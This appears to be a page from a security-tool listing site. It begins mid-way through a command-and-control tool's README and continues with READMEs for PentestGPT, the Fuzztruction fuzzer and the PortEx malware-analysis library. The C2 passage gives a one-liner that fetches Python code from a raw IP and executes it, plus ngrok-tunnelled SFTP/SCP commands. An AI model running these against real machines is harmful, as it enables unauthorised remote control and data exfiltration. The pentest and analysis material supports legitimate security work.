python3 asyncssh_commander.py "python3 -c \"import sys; import ssl; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]], fromlist=('urlopen',)); r=u.urlopen('http://100.100.100.100:8080/YnrVekAsVF', context=ssl._create_unverified_context()); exec(r.read());\""


Get list of active tunnels:

python3 get_endpoints.py


Generate new RSA key pairs:

python3 gen_rsa.py

Advanced Usage

Using SFTP and SCP - you don't need a valid username just the correct id_rsa

  • With proxy:

proxychains sftp -P NGROK_PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -o ProxyCommand="nc -x localhost:9050 %h NGROK_PORT" source_file ddddd@NGROK_HOST:destination_path


  • No proxy:

sftp -P PORT -i id_rsa ddddd@NGROK_HOST

scp -i id_rsa -P PORT source_file ddddd@NGROK_HOST:destination_path


Compiling with Nuitka

python -m pip install nuitka

python -m nuitka --standalone --onefile asyncssh_server.py


Weaponized server

https://github.com/hacktivesec/MaccaroniC2/blob/main/weaponized_server.py

For furter information check the related article: https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/

DISCLAIMER: This tool is intended for testing and educational purposes only. It should only be used on systems with proper authorization. Any unauthorized or illegal use of this tool is strictly prohibited. The creator of this tool holds no responsibility for any misuse or damage caused by its usage. Please ensure compliance with applicable laws and regulations while utilizing this tool. Additionally, it’s important to note that the usage of Ngrok in conjunction with this tool may result in the violation of the terms of service or policies of certain platforms. It is advisable to review and comply with the terms of use of any platform or service to avoid potential account bans or disruptions.



PentestGPT - A GPT-empowered Penetration Testing Tool

By: Zion3R


A GPT-empowered penetration testing tool.

Common Questions

  • Q: What is PentestGPT?
    • A: PentestGPT is a penetration testing tool empowered by ChatGPT. It is designed to automate the penetration testing process. It is built on top of ChatGPT and operate in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • Q: Do I need to be a ChatGPT plus member to use PentestGPT?
    • A: Yes. PentestGPT relies on GPT-4 model for high-quality reasoning. Since there is no public GPT-4 API yet, a wrapper is included to use ChatGPT session to support PentestGPT. You may also use GPT-4 API directly if you have access to it.
  • Q: Why GPT-4?
    • A: After empirical evaluation, we found that GPT-4 performs better than GPT-3.5 in terms of penetration testing reasoning. In fact, GPT-3.5 leads to failed test in simple tasks.
  • Q: Why not just use GPT-4 directly?
    • A: We found that GPT-4 suffers from losses of context as test goes deeper. It is essential to maintain a "test status awareness" in this process. You may check the PentestGPT design here for more details.
  • Q: What about AutoGPT?
    • A: AutoGPT is not designed for pentest. It may perform malicious operations. Due to this consideration, we design PentestGPT in an interactive mode. Of course, our end goal is an automated pentest solution.
  • Q: Future plan?
    • A: We're working on a paper to explore the tech details behind automated pentest. Meanwhile, please feel free to raise issues/discussions. I'll do my best to address all of them.

Getting Started

  • PentestGPT is a penetration testing tool empowered by ChatGPT.
  • It is designed to automate the penetration testing process. It is built on top of ChatGPT and operate in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • PentestGPT is able to solve easy to medium HackTheBox machines, and other CTF challenges. You can check this example in resources where we use it to solve HackTheBox challenge TEMPLATED (web challenge).
  • A sample testing process of PentestGPT on a target VulnHub machine (Hackable II) is available at here.
  • A sample usage video is below: (or available here: Demo)

Installation

Before installation, we recommend you to take a look at this installation video if you want to use cookie setup.

  1. Install requirements.txt with pip install -r requirements.txt
  2. Configure the cookies in config. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py.
    • If you're using cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
      • Login to ChatGPT session page.
      • In Inspect - Network, find the connections to the ChatGPT session page.
      • Find the cookie in the request header in the request to https://chat.openai.com/api/auth/session and paste it into the cookie field of config/chatgpt_config.py. (You may use Inspect->Network, find session and copy the cookie field in request_headers to https://chat.openai.com/api/auth/session)
      • Note that the other fields are temporarily deprecated due to the update of ChatGPT page.
      • Fill in userAgent with your user agent.
    • If you're using API:
      • Fill in the OpenAI API key in chatgpt_config.py.
  3. To verify that the connection is configured properly, you may run python3 test_connection.py. You should see some sample conversation with ChatGPT.
    • A sample output is below
    1. You're connected with ChatGPT Plus cookie. 
    To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
    ## Test connection for OpenAI api (GPT-4)
    2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
  4. (Notice) The above verification process for cookie. If you encounter errors after several trials, please try to refresh the page, repeat the above steps, and try again. You may also try with the cookie to https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problem.

Usage

  1. To start, run python3 main.py --args.
    • --reasoning_model is the reasoning model you want to use.
    • --useAPI is whether you want to use OpenAI API.
    • You're recommended to use the combination as suggested by test_connection.py, which are:
      • python3 main.py --reasoning_model=gpt-4
      • python3 main.py --reasoning_model=gpt-4 --useAPI
      • python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
  2. The tool works similar to msfconsole. Follow the guidance to perform penetration testing.
  3. In general, PentestGPT intakes commands similar to chatGPT. There are several basic commands.
    1. The commands are:
      • help: show the help message.
      • next: key in the test execution result and get the next step.
      • more: let PentestGPT to explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
      • todo: show the todo list.
      • discuss: discuss with the PentestGPT.
      • google: search on Google. This function is still under development.
      • quit: exit the tool and save the output as log file (see the reporting section below).
    2. You can use <SHIFT + right arrow> to end your input (and is for next line).
    3. You may always use TAB to autocomplete the commands.
    4. When you're given a drop-down selection list, you can use cursor or arrow key to navigate the list. Press ENTER to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.
  4. In the sub-task handler initiated by more, users can execute more commands to investigate into a specific problem:
    1. The commands are:
      • help: show the help message.
      • brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
      • discuss: discuss with PentestGPT about this local task.
      • google: search on Google. This function is still under development.
      • continue: exit the subtask and continue the main testing session.

Report and Logging

  1. After finishing the penetration testing, a report will be automatically generated in logs folder (if you quit with quit command).
  2. The report can be printed in a human-readable format by running python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Gelei Deng - gelei.deng@ntu.edu.sg



Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target

By: Zion3R

Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called consumer, but triggers unexpected behavior in deeper program logic. This allows to even fuzz targets that utilize cryptography primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.

For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments submodule documentation after reading this document.

Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.

Β 

Quickstart

# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# donwloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# own targets (use the next command instead).
./env/pull-prebuilt.sh

# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh

# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env /start.sh

# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh

# Runninge start.sh the second time will automatically build the fuzzer.

# See `Fuzzing a Target using Fuzztruction` below for further instructions.

Components

Fuzztruction contains the following core components:

Scheduler

The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler directory.

Generator

The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.

The implementation of the generator can be found in the generator directory. It consists of two components that are explained in the following.

Compiler Pass

The compiler pass (generator/pass) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.

The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs, which we also published on crates.io.

During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.

Agent

The agent, implemented in generator/agent is running in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are the implementation of a forkserver and communicating with the scheduler. Based on the instruction passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.

Consumer

The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.

Preparing the Runtime Environment (Docker Image)

Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:

git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

Local Build

The Fuzztruction runtime environment can be built by executing env/build.sh. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm directory.

Pre-built

In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh.

The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments submodule.

Managing the Runtime Environment Lifecycle

After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzers environment lifecycle is managed by a set of scripts located in the env folder.

Script Description
./env/start.sh Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first.
./env/stop.sh This stops the container. Remember to call this after rebuilding the image.

Using start.sh, an arbitrary number of shells can be spawned in the container. Using Visual Studio Codes' Containers extension allows you to work conveniently inside the Docker container.

Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.

Runtime Environment Details

This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user and has passwordless sudo access per default.

Permissions: The Docker images' user is named user and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.

Inside the container, the following paths are (bind) mounted from the host:

Container Path Host Path Note
/home/user/fuzztruction ./ Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host.
/home/user/shared ./ Used to exchange data with the host.
/home/user/.zshrc ./data/zshrc -
/home/user/.zsh_history ./data/zsh_history -
/home/user/.bash_history ./data/bash_history -
/home/user/.config/nvim/init.vim ./data/init.vim -
/home/user/.config/Code ./data/vscode-data Used to persist Visual Studio Code config between container restarts.
/ssh-agent $SSH_AUTH_SOCK Allows using the SSH-Agent inside the container if it runs on the host.
/home/user/.gitconfig /home/$USER/.gitconfig Use gitconfig from the host, if there is any config.
/ccache ./data/ccache Used to persist ccache cache between container restarts.

Usage

After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.

Building Fuzztruction

For building Fuzztruction, it is sufficient to call cargo build in /home/user/fuzztruction. This will build all components described in the Components section. The most interesting build artifacts are the following:

Artifacts Description
./generator/pass/fuzztruction-source-llvm-pass.so The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell.
./generator/pass/fuzztruction-source-clang-fast A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main.
./target/debug/libgenerator_agent.so The agent the is injected into the generator application.
./target/debug/fuzztruction The fuzztruction binary representing the actual fuzzer.

Fuzzing a Target using Fuzztruction

We will use libpng as an example to showcase Fuzztruction's capabilities. Since libpng is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, the building process may take up to several hours for building the AFL++ binary because of the collision free coverage map encoding feature and compare splitting.

Building the Target

Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/ directory and execute ./build.sh libpng. This will pull the source and start the build according to the steps defined in libpng/config.sh.

Benchmarking the Target

Using the following command

sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml  --purge --show-output benchmark -i 100

allows testing whether the target works. Each target is defined using a YAML configuration file. The files are located in the configurations directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml file is extensively documented.

Troubleshooting

If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.

  • Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
  • Setting AFL_DEBUG in the env section of the sink in the YAML config can give you a more detailed output regarding the consumer.
  • Executing the generator and consumer using the same flags as in the config file might reveal any typo in the command line used to execute the application. In the case of using LD_PRELOAD, double check the provided paths.

Running the Fuzzer

To start the fuzzing process, executing the following command is sufficient:

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m

This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory attribute in the target's config file. In case of pngtopng, the default location is /tmp/pngtopng-pngtopng.

If the working directory already exists, --purge must be passed as an argument to fuzztruction to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz or benchmark.

Combining Fuzztruction and AFL++

For running AFL++ alongside Fuzztruction, the aflpp subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute

sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m

for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting folder in the working directory. In case AFL++ should be executed independently but based on the same .yml configuration file, the --suffix argument can be used to append a suffix to the working directory of the spawned fuzzer.

Computing Coverage

After the fuzzing run is terminated, the tracer subcommand allows to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.

The coverage tool located at ./target/debug/coverage can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp in case of the previous example). Executing ./target/debug/coverage /tmp will generate a .csv file that maps time to the number of covered basic blocks and a .json file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.



PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

Features

  • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
  • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
  • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
  • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
  • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
  • Calculate Shannon Entropy and Chi Squared for files and sections
  • Calculate ImpHash and Rich and RichPV hash values for files and sections
  • Parse RichHeader and verify checksum
  • Calculate and verify Optional Header checksum
  • Scan for PEiD signatures, internal file type signatures or your own signature database
  • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
  • Extract Unicode and ASCII strings contained in the file
  • Extraction and conversion of .ICO files from icons in the resource section
  • Extraction of version information and manifest from the file
  • Reading .NET metadata and streams (Alpha)

For more information have a look at PortEx Wiki and the Documentation

PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar

The GUI version is available here: PortexAnalyzerGUI

Using PortEx

Including PortEx to a Maven Project

You can include PortEx to your project by adding the following Maven dependency:

<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
</dependency>

To use a local build, add the library as follows:

<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
<scope>system</scope>
<systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx to an SBT project

Add the dependency as follows in your build.sbt

libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

Building PortEx

Requirements

PortEx is build with sbt

Compile and Build With sbt

To simply compile the project invoke:

$ sbt compile

To create a jar:

$ sbt package

To compile a fat jar that can be used as command line tool, type:

$ sbt assembly

Create Eclipse Project

You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

Generate the project files for Eclipse:

$ sbt eclipse

Import the project to Eclipse via the Import Wizard.

Donations

I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs



❌